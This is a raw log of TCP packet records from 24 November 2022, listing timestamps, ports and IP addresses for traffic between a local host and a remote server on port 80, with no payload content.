Nov 24, 2022 12:20:03.590684891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590694904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590717077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590727091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590750933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590758085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590787888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590792894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590822935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590858936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590871096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590914965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590920925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590954065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590979099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591002941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591036081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591073036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591111898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591149092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591183901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591223955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591233969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591253042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591259003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591286898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591295004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591308117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591331005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591347933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591368914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591411114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591437101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591470957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591495991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591506958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591532946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591543913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591562986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591578007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591614962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591645956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591681957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591720104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591756105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591789961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591825962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591859102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591870070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591895103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591909885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591933012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591933966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.591972113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.591995955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592003107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592040062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592067003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592077017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592101097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592113018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592140913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592154980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592176914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592211962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592247009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592283010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592319965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592355967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592390060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592395067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592425108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592428923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592458963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592494965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592529058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592573881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592609882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592644930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592681885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592713118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592750072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592751980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592773914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592784882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592809916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592823029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592829943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592859983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592901945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592941046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.592950106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592969894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.592977047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593003988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593014002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593030930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593049049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593059063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593085051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593122959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593157053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593194008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593230009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593264103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593302965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593331099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593354940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593379974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593406916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593411922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593446970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593472004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593482971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593502045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593518972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593529940 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593552113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593564987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593580008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593600988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593616009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593626976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593648911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593652010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593674898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593688965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593697071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593730927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593769073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593771935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593803883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593838930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593844891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593874931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593890905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.593911886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593949080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.593985081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594022036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594053984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594088078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594121933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594137907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594158888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594170094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594193935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594208956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594228983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594244003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594264030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594279051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594300985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594336033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594372988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594381094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594400883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594402075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594438076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594474077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594475031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594475031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594502926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594508886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594537973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594547033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594568968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594582081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594590902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594618082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594629049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594656944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594664097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594696045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594701052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594736099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594773054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594794035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594809055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594836950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594846010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594867945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594904900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594909906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594944954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.594957113 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.594983101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595012903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595051050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595052958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595086098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595086098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595120907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595123053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595143080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595159054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595165014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595196009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595206022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595235109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595241070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595272064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595309019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595316887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595345974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595347881 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595376968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595402002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595424891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595427990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595458031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595460892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595493078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595516920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595516920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595529079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595535040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595566988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595602989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595618963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595639944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595654011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595675945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595693111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595710039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595721960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595740080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595752954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595768929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595781088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595804930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595805883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595840931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595863104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.595876932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595912933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595942974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.595980883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.596012115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.596101999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614084959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614126921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614151955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614180088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614203930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614229918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614259005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614259958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614284992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614311934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614321947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614340067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614366055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614367008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614396095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614403009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614422083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614435911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614451885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614475012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614478111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614500999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614506006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614523888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614531994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614557028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614558935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614586115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614587069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614613056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614614010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614635944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614639997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614664078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614665985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614691973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614700079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614718914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614721060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614742041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614746094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614763021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614768028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614789009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614794970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614813089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614823103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614840031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614852905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614866972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614901066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614919901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614933968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614943981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614960909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.614974976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.614990950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615000010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615019083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615041971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615047932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615066051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615077972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615092993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615108013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615122080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615135908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615151882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615161896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615189075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615214109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615233898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615238905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615264893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615269899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615289927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615308046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615319014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615344048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615344048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615371943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615382910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615401030 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615401983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615425110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615428925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615447044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615454912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615470886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615482092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615499973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615505934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615530968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615550995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615557909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615582943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615586042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615586042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.615609884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.615614891 CET	49710	80	192.168.2.3	66.235.200.147
